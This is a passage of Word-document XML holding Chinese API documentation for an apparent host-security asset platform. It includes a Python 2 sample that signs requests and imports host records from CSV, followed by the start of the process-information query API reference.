      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    if data is not None:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        info = ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        if method == "GET":</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            # 对参数key进行字典排序</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            keys = sorted(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>data.keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>())</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            for key in keys:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                info = info + key + str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>data.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(key))</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> method == "POST" or method == "PUT" or method == "DELETE":</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            info = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json.dumps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        # 拼接待签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to_sign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + info + str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sign_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        # 拼接待签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to_sign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sign_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 对待签名字符串进行sha1得到签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    sign = hashlib.sha1(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to_sign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hexdigest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 组装http请求头参数</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    header = {"Content-Type": "application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">": </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, "timestamp": </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">              "sign": sign, "Authorization": "Bearer " + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jwt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>httplib.HTTPConnection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conn.request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(method=method, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, body=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json.dumps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(data), headers=header)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    response = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conn.getresponse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>response.read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>import_csv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    if not </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os.path.exists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>host_file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        return</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>insert_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    #从csv中获取待插入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mongodb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>的数据</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>insert_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    with open(host_file,'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">') as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>csvfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>csv_reader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>csv.reader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>csvfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>host_header</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = next(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>csv_reader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        for row in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>csv_reader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>insert_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = {"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":row[0],"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostname":row</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[1],"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>assetLevel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":row[2], "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chargeName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":row[3], "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chargeEmail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":row[4],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostLocation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":row[5],"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>assetNumber</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":row[6], "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":row[7],"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>remark":row</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[8], "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, "type":</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>choiceType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">("POST", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>insert_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print "start"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>import_csv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print "done"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E52A24" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc115166091"/>
      <w:bookmarkStart w:id="34" w:name="进程信息"/>
      <w:bookmarkEnd w:id="24"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r>
        <w:t>进程信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="528E967F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433063CC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该功能API用于查询资产中的进程信息，获取查询的结果并展示；每条数据均包含主机信息，您可以灵活的使</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>用该API组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327164E6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43389296" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>进程信息查询有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5C65D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接获取当前信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBB279F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>更新数据后，再获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EBBBD4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>为了满足上述功能，我们提供了三个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23918F48" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>进程信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223279C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>进程信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057678C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>进程信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D030CBB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690C3780" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接查询当前信息则直接调用进程信息查询结果接口（即1号接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BA13FA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>获取更新数据则先调用2号接口进行更新再调用3号接口查看是否更新完成，最后再调用1号接口查询最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419D1591" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>接口的调用方法、参数和返回信息等具体如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42513AE9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc115166092"/>
      <w:bookmarkStart w:id="36" w:name="进程信息查询结果"/>
      <w:r>
        <w:t>进程信息查询结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="414DD150" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于查询进程信息，按每台主机每个进程进行展示；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6163CDA4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD4F5C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/process/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E5AE09"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841"/>
        <w:gridCol w:w="1232"/>
        <w:gridCol w:w="564"/>
        <w:gridCol w:w="6445"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="3109585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6524179" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CA68D42" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C85EFB2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19496DE3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4EC99FBA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E8F926B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74F0FA45" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BBE1C61" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2753A40F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4B526C72" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="280178F7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B8A5FC4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数</w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6688B958" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="263B4853" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2F806DD2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34173884" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79DFF764" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2022B68F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EC24FE8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4F9B4E43" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D01D28D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
